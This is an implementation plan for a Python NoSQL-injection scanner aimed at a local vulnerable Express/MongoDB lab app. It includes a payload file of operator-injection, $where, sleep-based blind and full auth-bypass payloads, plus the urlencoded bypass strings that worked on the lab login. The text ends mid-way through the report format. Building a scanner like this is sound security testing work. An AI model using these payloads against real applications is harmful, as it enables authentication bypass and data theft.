NoSQL Injection CLI Scanner — Implementation Plan

Document Control

Field	Value
Project	NoSQL Injection CLI Scanner
Artifact	Implementation Plan v1.0
Runtime	Python 3.10+ (CPython), Windows / Linux / macOS
Stack	`argparse`, `requests`, `beautifulsoup4`, `rich`, `urllib3`
Target App	Custom Express/MongoDB app at `website/` (localhost:3000)
Version	1.0 Planning Baseline
Date	2026-04-22

1. Vision and Outcome

We are building a Python CLI vulnerability scanner that automatically detects NoSQL injection flaws in MongoDB-backed web applications. The tool crawls a target website, discovers forms and API inputs, injects categorized NoSQL payloads (operator injection, regex extraction, logic bypasses) via both URL-encoded and JSON content types, and analyzes server responses to flag authentication bypasses, data leaks, and abnormal behaviors. This matters because MongoDB/Node.js stacks are widely deployed yet under-tested for injection flaws — this tool gives security researchers and developers a repeatable, automated way to audit their applications without manual curl testing.

User Flow

Invoke — User runs python scanner.py --url http://localhost:3000 --max-depth 2 --output report.json --verbose from the cli/ directory.
Validate — Scanner validates the URL, confirms the target is reachable, and establishes a baseline response fingerprint.
Crawl — Scanner crawls internal pages within scope (up to --max-depth), collecting all discoverable HTML forms and their field structures.
Inject — For each discovered form, payloads from payloads.json are injected into each field. Each payload is tested as both application/x-www-form-urlencoded and application/json where applicable.
Analyze — Response analysis engine compares each response against the baseline, checking for status code changes, body content anomalies (e.g., "ok": true where "ok": false was expected), redirect behavior changes, and timing anomalies.
Report — Scanner writes a structured JSON report and prints a colorized console summary with severity-scored findings.

2. Scope

In Scope (V1)

CLI argument parsing with argparse (--url, --max-depth, --timeout, --delay, --output, --verbose, --content-type, --endpoints, --categories)
URL validation and normalization (scheme enforcement, trailing-slash normalization)
Recursive page crawler with scope restriction (same-origin only) and configurable depth limit
HTML form discovery via BeautifulSoup — extracting action, method, input name/type attributes
Curated payloads.json with categorized vectors:
- Operator injection: $ne, $gt, $regex, $in, $nin, $exists
- Logic bypass: ' || 1==1, $where clauses
- Time-based blind: sleep() payloads for timing side-channel detection
- Derived from nosqli_wordlist.txt and the NoSQL Injection reference guide
Dual content-type testing: each payload submitted as both application/x-www-form-urlencoded and application/json
Response analysis heuristics:
- Status code delta — 401 → 200 indicates bypass
- Body content matching — "ok": true, "Login successful", "count": changes
- Redirect detection — 3xx or client-side redirect indicators
- Timing analysis — response time > baseline + threshold indicates blind injection
- Error signature detection — MongoDB/Mongoose error strings in response body
Severity scoring: Critical / High / Medium / Low / Info
Structured JSON report matching the contract in README.md
Colorized console summary via rich
Session-aware scanning (cookie jar persistence across requests to handle authenticated flows)
Logging with Python logging module at configurable verbosity levels
Robust error handling: timeouts, connection errors, malformed HTML, unreachable targets

Out of Scope (V1)

Automated data exploitation/dumping — the scanner detects and proves, but does not extract database contents beyond proof-of-concept confirmation
Server-Side JavaScript Injection (SSJI) evaluation — $where payloads are included for detection, but arbitrary JS execution chains are not evaluated
GUI/Web interface — CLI only
Non-MongoDB databases — no CouchDB, Cassandra, or Redis-specific payloads
Proxy/interceptor integration — no Burp Suite or ZAP plugin mode
Distributed/multi-threaded scanning — single-threaded sequential scanning for V1
Custom authentication flows — scanner supports cookie-based sessions; OAuth/JWT/SAML are deferred

3. Quality Bar and Success Criteria

Functional Success

Scanner correctly identifies the known auth bypass on POST /api/vuln/login when injecting {"username": {"$gt": ""}, "password": {"$gt": ""}} — rated Critical/High
Scanner correctly identifies search injection on GET/POST /api/vuln/search when injecting operator objects — rated High/Medium
Scanner produces zero false positives when run against POST /api/secure/login and GET /api/secure/search (secure mode rejects all operator payloads with 400)
Scanner discovers at least the login form on /login.html and search form on /search.html via crawling
JSON report output validates against the report contract defined in README.md

Security Success

Scanner never stores or leaks target credentials beyond the scan session
All payloads are loaded from the external payloads.json file — no hardcoded attack strings in source
Scanner includes a mandatory --i-agree-to-legal-terms flag or disclaimer prompt before scanning non-localhost targets
No dependency with known CVEs at time of release

Performance Success

Full scan of the target app (2 pages, ~30 payloads × 2 content types × 2 forms) completes in under 60 seconds with default timeout (5s per request)
Individual request timeout default: 5 seconds
Memory usage under 100MB for any scan

Operability Success

pip install -r requirements.txt from a clean venv succeeds on Python 3.10+
python scanner.py --help prints complete usage documentation
Scanner exits with code 0 on success, 1 on scan errors, 2 on argument errors

UX/DX Success

Console output uses color-coded severity levels (red=Critical, orange=High, yellow=Medium, cyan=Low)
Progress indicators show current phase (Crawling → Injecting → Analyzing → Reporting)
Verbose mode logs every request/response pair for lab analysis and debugging

4. Target Architecture

4.1 Core Components

1. CLI Entry Point (scanner.py) The main entry point. Parses arguments via argparse, orchestrates the scan pipeline (validate → crawl → inject → analyze → report), and handles top-level error boundaries. Owns the decision of which phases to run and in what order.

2. URL Validator (core/validator.py) Validates and normalizes the target URL. Ensures scheme is http/https, resolves trailing slashes, and performs a reachability check (HEAD request) before the scan begins. Returns a canonical base URL for the crawler.
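
A minimal sketch of the validation and normalization step described above, using only `urllib.parse`. The exact normalization rules (lowercasing the host, dropping the trailing slash, query string, and fragment) are assumptions; the plan only requires scheme enforcement and trailing-slash handling. The reachability check is left out because it needs a live target.

```python
from urllib.parse import urlsplit, urlunsplit


def validate_url(url: str) -> str:
    """Return a canonical base URL, or raise ValueError if the input is unusable."""
    parts = urlsplit(url.strip())
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"URL scheme must be http or https: {url!r}")
    if not parts.hostname:
        raise ValueError(f"URL has no hostname: {url!r}")
    # Assumed normalization: lowercase host, drop trailing slash,
    # query string, and fragment.
    path = parts.path.rstrip("/")
    return urlunsplit((parts.scheme, parts.netloc.lower(), path, "", ""))


def get_base_origin(url: str) -> str:
    """Return scheme://host[:port] for same-origin comparisons."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc.lower()}"
```

Returning a URL without a trailing slash keeps later `urljoin` calls predictable, but the crawler then has to treat `http://host` and `http://host/` as the same page.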

3. Web Crawler (core/crawler.py) Recursively discovers pages within the target's origin up to --max-depth. Maintains a visited-URL set to avoid cycles. For each discovered page, delegates to the form parser. Uses requests.Session for cookie persistence. Respects robots.txt as a courtesy (configurable).

4. Form Parser (core/form_parser.py) Uses BeautifulSoup to extract all <form> elements from a page. For each form, captures: action URL (resolved to absolute), HTTP method, input field names and types, and any hidden fields. Returns structured FormTarget objects for the injection engine.

5. Payload Manager (core/payloads.py) Loads and categorizes payloads from payloads.json. Exposes payloads grouped by category (operator_injection, logic_bypass, regex_extraction, time_based, auth_bypass_combo, blind_bruteforce). Each payload entry includes the payload value, a description of the expected behavior, and the applicable content types; the category tag is taken from the enclosing key in payloads.json.

6. Injection Engine (core/injector.py) Takes a FormTarget and a list of payloads. For each injectable field, substitutes the payload and submits the form. Tests each payload under both application/x-www-form-urlencoded and application/json content types. Records the full request/response pair for analysis. Supports configurable inter-request delay.

7. Response Analyzer (core/analyzer.py) Compares each injection response against a baseline response (captured by submitting the form with benign data). Implements heuristic checks: status code delta, body content keyword matching, response length delta, redirect detection, timing anomaly detection (for time-based blind), and MongoDB error string scanning. Assigns a severity and confidence score to each finding.

8. Report Generator (core/reporter.py) Collects all findings from the analyzer and produces: (a) a structured JSON report file matching the contract in README.md, and (b) a colorized console summary table using rich. Includes scan metadata (target, start/end time, total forms/payloads tested, findings count by severity).

9. Utilities (core/utils.py) Shared helpers: logging configuration, URL resolution, timing utilities, constant definitions (e.g., known MongoDB error signatures), and the disclaimer/legal prompt.

4.2 Proposed Folder/Module Structure

cli/
├── scanner.py                  # Entry point — CLI argument parsing and pipeline orchestration
├── requirements.txt            # Python dependencies
├── payloads.json               # Categorized NoSQL injection payloads
├── core/
│   ├── __init__.py
│   ├── validator.py            # URL validation and reachability check
│   ├── crawler.py              # Recursive same-origin page crawler
│   ├── form_parser.py          # BeautifulSoup-based HTML form extractor
│   ├── payloads.py             # Payload loader and category manager
│   ├── injector.py             # Form submission engine (URL-encoded + JSON)
│   ├── analyzer.py             # Response comparison and heuristic scoring
│   ├── reporter.py             # JSON report writer + Rich console summary
│   ├── utils.py                # Shared helpers, constants, logging setup
│   └── models.py               # Data classes: FormTarget, Finding, ScanResult, Payload
├── references/
│   ├── NoSQL Injection.md      # Reference guide (existing)
│   └── nosqli_wordlist.txt     # Raw wordlist (existing)
├── general plan.md             # Plan template (existing)
└── README.md                   # Usage documentation (existing)

5. Phase Plan

Phase 0 — Requirements and Risk Baseline

Goals: Confirm all requirements, validate the vulnerable target app is functional, and establish the development environment.

Work Packages:

Verify Python 3.10+ is installed and create the virtual environment (python -m venv .venv)
Populate requirements.txt with pinned versions: requests==2.32.*, beautifulsoup4==4.12.*, rich==13.*, urllib3==2.*
Start the target website (cd website && npm install && node src/server.js) and confirm it responds on http://localhost:3000
Manually verify the vulnerable endpoints still behave as documented in MODE_AUTH_FLOW_TEST_RESULTS.md:
- POST /api/vuln/login with username[$ne]=&password[$ne]= → 200 + "ok": true
- POST /api/vuln/login with legit creds → 200 + "ok": true
- POST /api/vuln/login with wrong creds → 401 + "ok": false
- POST /api/secure/login with password[$ne]= → 400 + "must be non-empty strings"
Create the cli/core/ package directory with __init__.py
Confirm payloads.json can be loaded and parsed (currently {}, will be populated in Phase 1)

Deliverables:

Working venv with all dependencies installed
Confirmed target app responses matching expected behavior
Empty cli/core/ package structure created

Exit Criteria:

pip install -r requirements.txt succeeds
Target app responds correctly to both legit and injection payloads
All team members have the same environment running

References: R1, R2, R3

Phase 1 — Foundation: Models, Payloads, and Utilities

Goals: Build the data layer and shared infrastructure that all other components depend on.

Work Packages:

Create core/models.py — Define the following dataclasses:

from dataclasses import dataclass
from typing import Any

@dataclass
class FormTarget:
    url: str              # Absolute action URL
    method: str           # GET or POST
    fields: list[dict]    # [{"name": "username", "type": "text"}, ...]
    page_url: str         # Page where the form was found

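@dataclass
class Payload:
    value: Any            # The payload (string, dict, or list)
    category: str         # operator_injection | regex_extraction | logic_bypass | time_based | auth_bypass_combo | blind_bruteforce
    description: str      # Human-readable explanation
    content_types: list[str]  # ["urlencoded", "json"] or subset
    expected_delay_ms: int | None = None  # Set on time_based entries in payloads.json
    is_full_body: bool = False            # True when value replaces the entire request body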

@dataclass
class Finding:
    severity: str         # critical | high | medium | low | info
    confidence: str       # confirmed | tentative | speculative
    endpoint: str         # e.g., /api/vuln/login
    form_page: str        # e.g., /login.html
    method: str           # POST, GET
    content_type: str     # The content type that triggered the finding
    payload: Any          # The exact payload that triggered it
    payload_category: str # Category from Payload
    evidence: str         # Human-readable evidence description
    baseline_status: int  # Expected status code
    actual_status: int    # Observed status code
    response_snippet: str # First 500 chars of response body
    response_time_ms: float

@dataclass
class ScanResult:
    target: str
    scan_start: str       # ISO 8601
    scan_end: str         # ISO 8601
    pages_crawled: int
    forms_discovered: int
    payloads_tested: int
    findings: list[Finding]

Create core/utils.py — Implement:
- setup_logging(verbose: bool) -> logging.Logger — configures root logger with Rich handler
- resolve_url(base: str, relative: str) -> str — uses urllib.parse.urljoin
- MONGODB_ERROR_SIGNATURES: list[str] — ["MongoError", "MongoServerError", "CastError", "ValidationError", "BSONTypeError", "$where", "mapReduce"]
- SUCCESS_INDICATORS: list[str] — ['"ok": true', '"ok":true', '"Login successful"', '"message": "Login successful"']
- FAILURE_INDICATORS: list[str] — ['"ok": false', '"ok":false', '"Invalid credentials"']
- print_banner() — prints ASCII art tool name and version

Populate payloads.json — Curate payloads derived from nosqli_wordlist.txt and NoSQL Injection.md. Structure:

{
  "operator_injection": [
    {
      "value": {"$ne": ""},
      "description": "Not-equal empty string bypass",
      "content_types": ["urlencoded", "json"]
    },
    {
      "value": {"$gt": ""},
      "description": "Greater-than empty string bypass",
      "content_types": ["urlencoded", "json"]
    },
    {
      "value": {"$ne": null},
      "description": "Not-equal null bypass",
      "content_types": ["json"]
    },
    {
      "value": {"$regex": ".*"},
      "description": "Wildcard regex match-all",
      "content_types": ["json"]
    },
    {
      "value": {"$regex": "^a"},
      "description": "Regex prefix extraction probe (letter a)",
      "content_types": ["json"]
    },
    {
      "value": {"$exists": true},
      "description": "Field existence check bypass",
      "content_types": ["json"]
    },
    {
      "value": {"$in": ["admin", "root", "administrator", "Admin"]},
      "description": "In-list common username brute force",
      "content_types": ["json"]
    },
    {
      "value": {"$nin": ["impossible_value_12345"]},
      "description": "Not-in exclusion bypass",
      "content_types": ["json"]
    }
  ],
  "logic_bypass": [
    {
      "value": "' || 1==1",
      "description": "JS logical OR tautology",
      "content_types": ["urlencoded"]
    },
    {
      "value": "' || 1==1//",
      "description": "JS logical OR tautology with comment",
      "content_types": ["urlencoded"]
    },
    {
      "value": "' || 1==1%00",
      "description": "JS logical OR with null byte terminator",
      "content_types": ["urlencoded"]
    },
    {
      "value": "true, $where: '1 == 1'",
      "description": "$where clause injection via string concatenation",
      "content_types": ["urlencoded"]
    },
    {
      "value": ", $where: '1 == 1'",
      "description": "$where clause injection (comma prefix)",
      "content_types": ["urlencoded"]
    }
  ],
  "regex_extraction": [
    {
      "value": {"$regex": "^admin"},
      "description": "Regex probe — starts with admin",
      "content_types": ["json"]
    },
    {
      "value": {"$regex": "^.{1,50}$"},
      "description": "Regex probe — match strings 1-50 chars",
      "content_types": ["json"]
    }
  ],
  "time_based": [
    {
      "value": {"$where": "sleep(3000)"},
      "description": "Time-based blind — 3 second sleep",
      "content_types": ["json"],
      "expected_delay_ms": 3000
    },
    {
      "value": "';sleep(3000);",
      "description": "JS injection sleep via string break",
      "content_types": ["urlencoded"],
      "expected_delay_ms": 3000
    }
  ],
  "auth_bypass_combo": [
    {
      "value": {"username": {"$gt": ""}, "password": {"$gt": ""}},
      "description": "Full auth bypass — both fields gt empty",
      "content_types": ["json"],
      "is_full_body": true
    },
    {
      "value": {"username": {"$ne": null}, "password": {"$ne": null}},
      "description": "Full auth bypass — both fields ne null",
      "content_types": ["json"],
      "is_full_body": true
    },
    {
      "value": {"username": {"$ne": "foo"}, "password": {"$ne": "bar"}},
      "description": "Full auth bypass — both fields ne arbitrary",
      "content_types": ["json"],
      "is_full_body": true
    },
    {
      "value": {"username": {"$in": ["admin", "root", "administrator"]}, "password": {"$gt": ""}},
      "description": "Admin brute force via $in + $gt bypass",
      "content_types": ["json"],
      "is_full_body": true
    }
  ]
}

Create core/payloads.py — Implement:
- load_payloads(filepath: str) -> dict[str, list[Payload]] — loads and validates payloads.json, returns categorized Payload objects
- get_all_payloads(categories: dict) -> list[Payload] — flattens all categories into a single list
- get_payloads_for_content_type(payloads: list[Payload], content_type: str) -> list[Payload] — filters payloads by content type
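
The loader functions listed above could look roughly like the sketch below. It redefines a reduced `Payload` so the block runs on its own, and it splits parsing (`parse_payloads`, a hypothetical helper not named in this plan) from file loading so the parsing logic can be exercised without touching disk. The fallback values for missing keys are assumptions.

```python
import json
from dataclasses import dataclass
from typing import Any


@dataclass
class Payload:
    value: Any
    category: str
    description: str
    content_types: list[str]


def parse_payloads(raw: dict) -> dict[str, list[Payload]]:
    """Turn the decoded payloads.json object into Payload lists keyed by category."""
    if not isinstance(raw, dict):
        raise ValueError("payloads file must contain a JSON object keyed by category")
    categories: dict[str, list[Payload]] = {}
    for category, entries in raw.items():
        categories[category] = [
            Payload(
                value=entry["value"],  # required; KeyError signals a malformed entry
                category=category,     # taken from the enclosing key
                description=entry.get("description", ""),
                content_types=entry.get("content_types", ["urlencoded", "json"]),
            )
            for entry in entries
        ]
    return categories


def load_payloads(filepath: str) -> dict[str, list[Payload]]:
    with open(filepath, encoding="utf-8") as fh:
        return parse_payloads(json.load(fh))


def get_all_payloads(categories: dict[str, list[Payload]]) -> list[Payload]:
    return [p for group in categories.values() for p in group]


def get_payloads_for_content_type(payloads: list[Payload], content_type: str) -> list[Payload]:
    return [p for p in payloads if content_type in p.content_types]
```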

Deliverables:

core/models.py with all dataclasses
core/utils.py with logging, URL helpers, and constants
core/payloads.py with loader and filter functions
Populated payloads.json with 20+ categorized payloads

Exit Criteria:

from core.models import FormTarget, Payload, Finding, ScanResult works
load_payloads("payloads.json") returns populated payload categories
All constants are centrally defined and importable

References: R1, R2, R3

Phase 2 — URL Validation and Web Crawler

Goals: Implement the input validation layer and recursive page crawler that discovers all forms within the target scope.

Work Packages:

Create core/validator.py — Implement:
- validate_url(url: str) -> str — checks scheme is http/https, normalizes trailing slash, validates hostname format. Raises ValueError on invalid input.
- check_reachability(url: str, timeout: int) -> tuple[bool, int, float] — sends HEAD request, returns (reachable, status_code, response_time_ms). Handles ConnectionError, Timeout, TooManyRedirects.
- get_base_origin(url: str) -> str — extracts scheme://host:port for scope comparison.
Create core/crawler.py — Implement:
- Crawler class with:
  - __init__(self, base_url: str, max_depth: int, timeout: int, session: requests.Session)
  - crawl(self) -> list[CrawledPage] — BFS/DFS traversal starting from base_url
  - _fetch_page(self, url: str) -> str | None — GET request, return HTML body or None on error
  - _extract_links(self, html: str, page_url: str) -> list[str] — find all <a href> links, resolve to absolute, filter to same origin
  - _is_in_scope(self, url: str) -> bool — checks if URL shares the same origin as base
- CrawledPage dataclass: url: str, html: str, depth: int
- Visited-URL deduplication via set
- Skip non-HTML resources (check Content-Type header before parsing)
- Log each discovered page at INFO level
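
The traversal, scope check, and visited-set deduplication above can be sketched without any network access by injecting the fetch function. This is an illustration under assumptions: it uses breadth-first order, the standard library's `html.parser` as a stand-in for link extraction, and a `fetch` callable that returns `None` for errors and non-HTML responses. The real `Crawler` class would wrap `requests.Session` instead.

```python
from collections import deque
from html.parser import HTMLParser
from typing import Callable, Optional
from urllib.parse import urldefrag, urljoin, urlsplit


class _LinkCollector(HTMLParser):
    """Collects href values from <a> tags."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def same_origin(url: str, base_url: str) -> bool:
    a, b = urlsplit(url), urlsplit(base_url)
    return (a.scheme, a.netloc.lower()) == (b.scheme, b.netloc.lower())


def crawl(base_url: str, max_depth: int,
          fetch: Callable[[str], Optional[str]]) -> list[tuple[str, int]]:
    """Breadth-first crawl; returns (url, depth) for every in-scope page fetched."""
    visited = {base_url}
    queue = deque([(base_url, 0)])
    pages: list[tuple[str, int]] = []
    while queue:
        url, depth = queue.popleft()
        html = fetch(url)  # None means error or non-HTML resource
        if html is None:
            continue
        pages.append((url, depth))
        if depth >= max_depth:
            continue  # do not follow links past the depth limit
        collector = _LinkCollector()
        collector.feed(html)
        for href in collector.hrefs:
            link, _fragment = urldefrag(urljoin(url, href))
            if same_origin(link, base_url) and link not in visited:
                visited.add(link)
                queue.append((link, depth + 1))
    return pages
```

Passing `fetch` in as a parameter keeps the traversal logic testable against an in-memory site map.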

Deliverables:

core/validator.py — URL validation and reachability
core/crawler.py — recursive crawler with scope enforcement

Exit Criteria:

validate_url("http://localhost:3000") returns normalized URL
validate_url("not-a-url") raises ValueError
Crawler("http://localhost:3000", max_depth=2, ...).crawl() discovers at least /, /login.html, /search.html
Crawler does not visit external links or non-HTML resources

References: R1, R4

Phase 3 — Form Discovery and Parsing

Goals: Extract all injectable form targets from crawled pages.

Work Packages:

Create core/form_parser.py — Implement:
- parse_forms(html: str, page_url: str) -> list[FormTarget] — uses BeautifulSoup to find all <form> tags
- For each form, extract:
  - action attribute → resolve to absolute URL using page_url as base
  - method attribute → default to GET if missing, normalize to uppercase
  - All <input>, <textarea>, <select> elements → capture name, type, value (default value if present)
  - Hidden fields are preserved (they may contain CSRF tokens or mode selectors)
- Return list of FormTarget objects
- Handle edge cases: forms with no action (submit to current page), forms with empty method, nested forms (invalid HTML but handle gracefully)
Integration test: Run crawler → form parser pipeline against http://localhost:3000 and verify:
- Login form discovered with fields: username (text), password (password), send-json (checkbox)
- Search form discovered with fields: query (text), send-json (checkbox)
- Action URLs resolve correctly (/api/vuln/login, /api/vuln/search or relative)

Important

The login and search forms in the target app submit via JavaScript (login.js, search.js), not via standard HTML form actions. The <form> tags may have no action attribute, or the action may not match the actual API endpoint. The form parser should extract what it finds from the HTML, but the injection engine (Phase 4) must allow manual endpoint override via CLI flag (--endpoints) or fall back to discovered API path inference by examining the JS files for fetch/XHR URLs.
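
One possible shape for the JS-based endpoint inference mentioned above is a regex pass over the script source. This is a rough sketch, not a JavaScript parser: the function name `infer_endpoints` is hypothetical, and the patterns only catch string-literal URLs passed directly to `fetch(...)` or `xhr.open(method, ...)`. URLs built from variables or template expressions would be missed, which is why the `--endpoints` override remains necessary.

```python
import re
from urllib.parse import urljoin

# First string-literal argument of fetch("...")
_FETCH_RE = re.compile(r"""fetch\(\s*['"`]([^'"`]+)['"`]""")
# Second string-literal argument of something.open("METHOD", "...")
_XHR_RE = re.compile(r"""\.open\(\s*['"][A-Za-z]+['"]\s*,\s*['"`]([^'"`]+)['"`]""")


def infer_endpoints(js_source: str, page_url: str) -> list[str]:
    """Return absolute candidate API URLs found in a script, in first-seen order."""
    found = _FETCH_RE.findall(js_source) + _XHR_RE.findall(js_source)
    # dict.fromkeys removes duplicates while preserving order
    return list(dict.fromkeys(urljoin(page_url, path) for path in found))
```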

Deliverables:

core/form_parser.py — BeautifulSoup-based form extractor
Verified form discovery against the live target

Exit Criteria:

parse_forms(html, "http://localhost:3000/login.html") returns at least one FormTarget with username and password fields
All form field names are correctly captured
Absolute action URLs are correctly resolved

References: R1, R4

Phase 4 — Injection Engine

Goals: Build the core scanning engine that submits payloads to discovered forms and records responses.

Work Packages:

Create core/injector.py — Implement:
- Injector class with:
  - __init__(self, session: requests.Session, timeout: int, delay: float, verbose: bool)
  - establish_baseline(self, form: FormTarget) -> BaselineResponse — submit the form with benign data (empty strings or placeholder values) to capture the "normal" response (status code, body length, key content markers, response time)
  - inject_form(self, form: FormTarget, payloads: list[Payload]) -> list[InjectionResult] — for each payload:
    1. For each injectable field (skip checkboxes, hidden fields with fixed values)
    2. For each applicable content type (urlencoded, json):
      - Build the request body with the payload substituted into the current field, benign values in other fields
      - For is_full_body payloads (auth_bypass_combo), use the payload as the entire request body
      - Submit and record: status code, response body, response headers, response time, any cookies set
      - Apply inter-request delay if configured
  - _build_urlencoded_body(self, form: FormTarget, field_name: str, payload_value) -> dict — for operator payloads like {"$ne": ""}, encode as field_name[$ne]=
  - _build_json_body(self, form: FormTarget, field_name: str, payload_value) -> dict — substitute payload object directly into JSON body
- BaselineResponse dataclass: status_code, body_length, body_hash, response_time_ms, key_markers (list of found SUCCESS/FAILURE indicators)
- InjectionResult dataclass: form, field_name, payload, content_type, status_code, body, headers, response_time_ms, cookies
URL-encoded operator encoding logic: When sending operator injection payloads via urlencoded content type, the injector must format them correctly for Express's qs parser:
- {"$ne": ""} → field_name[$ne]=
- {"$gt": ""} → field_name[$gt]=
- {"$regex": ".*"} → field_name[$regex]=.*
- {"$in": ["admin", "root"]} → field_name[$in][]=admin&field_name[$in][]=root
Session cookie management: The injector must use a shared requests.Session so that if a payload achieves login (sets a session cookie), subsequent requests to authenticated endpoints (like /api/vuln/search) can be tested in the authenticated context. The injector should also support resetting the session between payload groups to avoid cross-contamination (logout + new session).
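
The URL-encoded operator encoding rules listed above can be sketched as a small flattening function. The names `encode_operator_pairs` and `to_form_body` are illustrative, not part of the planned `Injector` API, and nested operator objects deeper than one level are not handled.

```python
from typing import Any
from urllib.parse import urlencode


def _to_text(value: Any) -> str:
    """Render a scalar the way it should appear in a form body."""
    if value is None:
        return ""
    if isinstance(value, bool):
        return "true" if value else "false"
    return str(value)


def encode_operator_pairs(field_name: str, payload_value: Any) -> list[tuple[str, str]]:
    """Flatten a payload into (key, value) pairs using qs-style bracket notation."""
    if not isinstance(payload_value, dict):
        return [(field_name, _to_text(payload_value))]
    pairs: list[tuple[str, str]] = []
    for operator, operand in payload_value.items():
        key = f"{field_name}[{operator}]"
        if isinstance(operand, list):
            # qs reads repeated key[] entries as an array
            pairs.extend((f"{key}[]", _to_text(item)) for item in operand)
        else:
            pairs.append((key, _to_text(operand)))
    return pairs


def to_form_body(pairs: list[tuple[str, str]]) -> str:
    """Percent-encode the pairs as an application/x-www-form-urlencoded body."""
    return urlencode(pairs)
```

A list of tuples is used rather than a dict because `$in` payloads repeat the same key. `requests` accepts such a list directly as the `data=` argument, so `to_form_body` is mainly useful for logging the exact body sent.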

Deliverables:

core/injector.py — injection engine with dual content-type support
Baseline capture and session management

Exit Criteria:

Injector correctly sends POST /api/vuln/login with {"username": {"$gt": ""}, "password": {"$gt": ""}} as JSON and receives 200
Injector correctly sends POST /api/vuln/login with username[$ne]=&password[$ne]= as urlencoded and receives 200
Injector correctly sends the same payloads to /api/secure/login and receives 400
Baseline response for login form correctly captures 401 status with "ok": false
Inter-request delay is respected

References: R1, R2, R3, R5

Phase 5 — Response Analysis and Severity Scoring

Goals: Implement the intelligence layer that determines whether an injection response indicates a vulnerability.

Work Packages:

Create core/analyzer.py — Implement:
- ResponseAnalyzer class with:
  - __init__(self, baseline: BaselineResponse, time_threshold_ms: float = 2500)
  - analyze(self, result: InjectionResult) -> Finding | None — runs all heuristic checks and returns a Finding if any trigger, or None if benign
  - _check_status_code_delta(self, result) -> tuple[bool, str] — returns True if status changed from failure (4xx) to success (2xx/3xx). Evidence: "Status changed from {baseline} to {actual}"
  - _check_auth_bypass(self, result) -> tuple[bool, str] — searches response body for SUCCESS_INDICATORS when baseline contained FAILURE_INDICATORS. Evidence: "Auth bypass detected: response contains 'Login successful'"
  - _check_data_leak(self, result) -> tuple[bool, str] — checks if response body contains significantly more data than baseline (body length ratio > 1.5x, or new JSON keys like "results", "count" appear). Evidence: "Data leak: response body {X}x larger than baseline"
  - _check_error_signature(self, result) -> tuple[bool, str] — scans response body for MONGODB_ERROR_SIGNATURES. Evidence: "MongoDB error exposed: {matched_signature}"
  - _check_timing_anomaly(self, result) -> tuple[bool, str] — if payload is time_based category and response_time > baseline + expected_delay * 0.8, flag. Evidence: "Time-based blind: response took {X}ms (baseline: {Y}ms)"
  - _check_redirect_change(self, result) -> tuple[bool, str] — if baseline had no redirect but injection response has 3xx or Location header. Evidence: "Unexpected redirect to {location}"

Severity scoring logic:

Condition	Severity	Confidence
Auth bypass confirmed (status 401→200 + success indicator in body)	critical	confirmed
Auth bypass partial (status change but no success indicator)	high	tentative
Data leak detected (significant body length increase)	high	confirmed
MongoDB error exposed	medium	confirmed
Time-based blind (timing confirms)	high	tentative
Redirect change observed	medium	speculative
Status code change only (no other indicators)	low	speculative
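
The table above can be read as an ordered rule list, sketched below. Two points are assumptions rather than something the table states: the rules are evaluated from most to least severe and the first match wins, and "auth bypass partial" is taken to mean a 4xx-to-2xx/3xx transition while "status code change only" means any other status difference. The `Signals` container is hypothetical; the real analyzer would derive these flags from its `_check_*` methods.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Signals:
    """Hypothetical bundle of heuristic outcomes for one injection result."""
    status_bypass: bool = False      # baseline 4xx became 2xx/3xx
    success_indicator: bool = False  # a SUCCESS_INDICATORS string is in the body
    data_leak: bool = False
    error_signature: bool = False
    timing_anomaly: bool = False
    redirect_change: bool = False
    status_changed: bool = False     # any other status difference


def score(signals: Signals) -> Optional[tuple[str, str]]:
    """Return (severity, confidence) for the first matching rule, or None."""
    rules = [
        (signals.status_bypass and signals.success_indicator, ("critical", "confirmed")),
        (signals.data_leak, ("high", "confirmed")),
        (signals.status_bypass, ("high", "tentative")),
        (signals.timing_anomaly, ("high", "tentative")),
        (signals.error_signature, ("medium", "confirmed")),
        (signals.redirect_change, ("medium", "speculative")),
        (signals.status_changed, ("low", "speculative")),
    ]
    for matched, verdict in rules:
        if matched:
            return verdict
    return None
```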

Finding deduplication: If the same endpoint+field combination triggers on multiple similar payloads (e.g., $ne and $gt both bypass login), keep the finding with the highest severity/confidence and note the others as corroborating evidence.
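
A sketch of the deduplication rule, assuming findings are ranked by severity first and confidence second. `MiniFinding` is a reduced stand-in for `Finding`; its `field_name` and `corroborating` attributes are assumptions, since the `Finding` dataclass in Phase 1 does not list an injected-field attribute or a place to record corroborating payloads.

```python
from dataclasses import dataclass, field

SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1, "info": 0}
CONFIDENCE_RANK = {"confirmed": 2, "tentative": 1, "speculative": 0}


@dataclass
class MiniFinding:
    endpoint: str
    field_name: str
    severity: str
    confidence: str
    payload_description: str
    corroborating: list[str] = field(default_factory=list)


def _rank(f: MiniFinding) -> tuple[int, int]:
    return (SEVERITY_RANK[f.severity], CONFIDENCE_RANK[f.confidence])


def deduplicate_findings(findings: list[MiniFinding]) -> list[MiniFinding]:
    """Keep the strongest finding per (endpoint, field); note the rest as evidence."""
    best: dict[tuple[str, str], MiniFinding] = {}
    for candidate in findings:
        key = (candidate.endpoint, candidate.field_name)
        current = best.get(key)
        if current is None:
            best[key] = candidate
            continue
        if _rank(candidate) > _rank(current):
            winner, loser = candidate, current
        else:
            winner, loser = current, candidate
        # Carry over everything the loser had already absorbed, plus the loser itself.
        winner.corroborating.extend(loser.corroborating + [loser.payload_description])
        best[key] = winner
    return list(best.values())
```

Note that this version mutates the `corroborating` list of the retained finding in place.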

Deliverables:

core/analyzer.py — multi-heuristic response analyzer with severity scoring
Finding deduplication logic

Exit Criteria:

Analyzer correctly flags the $ne/$gt auth bypass on /api/vuln/login as critical / confirmed
Analyzer correctly produces no findings for the same payloads against /api/secure/login
Time-based analysis correctly flags delayed responses (tested with time_based payloads)
MongoDB error exposure correctly detected when errors leak in response body

References: R1, R2, R5

Phase 6 — Report Generation and Console Output

Goals: Produce the final JSON report and a professional console summary.

Work Packages:

Create core/reporter.py — Implement:

generate_json_report(scan_result: ScanResult, output_path: str) — writes JSON matching the contract:

{
  "target": "http://localhost:3000",
  "scan_time": "2026-04-22T10:15:00Z",
  "scan_duration_seconds": 42,
  "summary": {
    "pages_crawled": 3,
    "forms_tested": 2,
    "payloads_tested": 48,
    "potential_findings": 4,
    "by_severity": {
      "critical": 1,
